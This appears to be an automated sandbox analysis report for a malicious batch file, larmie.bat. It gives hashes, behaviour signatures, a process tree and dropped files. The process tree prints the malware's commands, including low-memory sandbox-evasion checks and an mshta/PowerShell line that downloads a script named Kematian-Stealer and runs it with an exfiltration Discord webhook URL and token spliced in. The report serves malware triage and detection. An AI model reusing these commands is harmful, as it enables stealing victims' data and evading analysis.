Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    24/06/2024, 18:30

General

  • Target
    larmieW/larmie.bat
  • Size
    3.6MB
  • MD5
    e7e8306a93ea523ab066468443ffb196
  • SHA1
    48652fcd35e92550ded4ff3fcc277884732d6439
  • SHA256
    8d07eda5b26559da0f42a744dc34993dfb177d4a6a5235b9d4c79af2c340b4f0
  • SHA512
    9d7f57623396eff5cc1a64c3d83de5c318d52d07bc108656ceeb6aa4ac9acbaf9259e1955191330af0856f8407b8f9a7f861132e678790cdd61b4bdb2e17ac4b
  • SSDEEP
    6144:jjbHqlcHX7XK9xaMBSDlV6iIGVVKuobZa:DBAM/6iFQA

Score
7/10

Malware Config

Signatures

  • Drops startup file 2 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:2196
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
      PID:2548
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
      PID:2600
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
      PID:2284
    • C:\Windows\system32\chcp.com
      chcp 65001
      2⤵
      PID:2524
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
      PID:3036
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
      PID:2400
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2436
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic computersystem get manufacturer /value
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2468
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1596
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic computersystem get manufacturer /value
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2392
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
      PID:2916
    • C:\Windows\system32\rundll32.exe
      rundll32
      2⤵
      PID:2996
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
      PID:1436
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
      PID:2748
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
      PID:2760
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
      PID:872
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
      2⤵
      • Hide Artifacts: Ignore Process Interrupts
      • Suspicious behavior: EnumeratesProcesses
      PID:644
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
      PID:1660
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
      PID:2632
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1912
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic computersystem get manufacturer /value
        3⤵
        PID:1864
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
      2⤵
      PID:336
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic computersystem get manufacturer /value
        3⤵
        PID:544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
      2⤵
      • Hide Artifacts: Ignore Process Interrupts
      • Suspicious behavior: EnumeratesProcesses
      PID:1556
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
      2⤵
      PID:1752
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic computersystem get manufacturer /value
        3⤵
        PID:1120
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
      PID:2364
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\larmieW\larmie.bat"
      2⤵
      PID:848
    • C:\Windows\system32\timeout.exe
      timeout 0
      2⤵
      • Delays execution with timeout.exe
      PID:356
    • C:\Windows\system32\doskey.exe
      doskey VERIFY=CALL
      2⤵
      PID:1284
    • C:\Windows\system32\net.exe
      net session
      2⤵
      PID:1004
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
        PID:2868
    • C:\Windows\system32\timeout.exe
      timeout 0
      2⤵
      • Delays execution with timeout.exe
      PID:1324
    • C:\Windows\system32\mshta.exe
      mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1249045721093767279/Lz3dAGN07f4uZc0v6gC8iYaLcuN6mzx5_rGPuF3crLPHJRXtyfNcSAyrHREtUP1JtzH3' | iex",0))
      2⤵
      • Modifies Internet Explorer settings
      PID:292
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1249045721093767279/Lz3dAGN07f4uZc0v6gC8iYaLcuN6mzx5_rGPuF3crLPHJRXtyfNcSAyrHREtUP1JtzH3' | iex
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1748

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\larmieW\kdotDgKSKR.bat
    Filesize: 181B
    MD5: 692f7565ccaf213975a6b85b620a6d96
    SHA1: 20ea4815c0e06fdd1870348987a2687885d34f62
    SHA256: 2480fec57fb8d4d05a7052d55a43dc7e1644f8d92fc6696f9e7415fb8bded5d2
    SHA512: 5d5bf7e704d7ab0c15fd3c40a16ad753e9f4fa39b0f47f6efa9a2e4d824f1e8167b01f57032bd60669024ddb62381fb1fa88808ce93d07b639e52aac9ce57633
  • C:\Users\Admin\AppData\Local\Temp\larmieW\kdotLWsvu.bat
    Filesize: 13B
    MD5: 337065424ed27284c55b80741f912713
    SHA1: 0e99e1b388ae66a51a8ffeee3448c3509a694db8
    SHA256: 4ef6f5f73f87cd552bf0dceb245365c44996f94eb72aeb2ccefe440fe055043b
    SHA512: d9290f0aa33e11da2ec88165b8133623e3f1633a9df8f477dfab395f655dc9a1d2dc82e8eae1d8eeae950ea2dd1e08054e1b258a0f2a0b4d4ca124db08e42e5a
  • C:\Users\Admin\AppData\Local\Temp\larmieW\kdotLWsvu.bat
    Filesize: 90B
    MD5: a76646b40aec1c86b1a493fe1454fe4e
    SHA1: 13d2be4be82478770d637bcf79817fc3b7c99798
    SHA256: f5007222ee53739427ac39f3e63fdbeeb0af962afd3343b2eaceb605e5dabe4d
    SHA512: ae1b02a76800bb16fe4b0cc2f94050f8108d9fbecc673cf775212a9d55cf661332296facd31dd64af0297704658b337eb12b2fba4c2db93e9d7dbe0cc79458d5
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize: 7KB
    MD5: 370df60cd6b7275a0c8bdab502e69140
    SHA1: d8102dbf9e85a1416bc5a762a075b139fbd3915e
    SHA256: a0752e3cd12fb313c27327031f5a7c8bab0896921893d759f46c5968210db5f8
    SHA512: e97450dafc205a44b8ba1f22db76434769077dcf4e6ae2f63e95e0795f0d0f80e3422bb893c420c47b92182283006217432f1b2f352aed5b4beaf6c978e50f7f
  • memory/644-114-0x000000001B5D0000-0x000000001B8B2000-memory.dmp
    Filesize: 2.9MB
  • memory/644-115-0x0000000002970000-0x0000000002978000-memory.dmp
    Filesize: 32KB
  • memory/1556-143-0x000000001B730000-0x000000001BA12000-memory.dmp
    Filesize: 2.9MB
  • memory/1556-144-0x0000000001EF0000-0x0000000001EF8000-memory.dmp
    Filesize: 32KB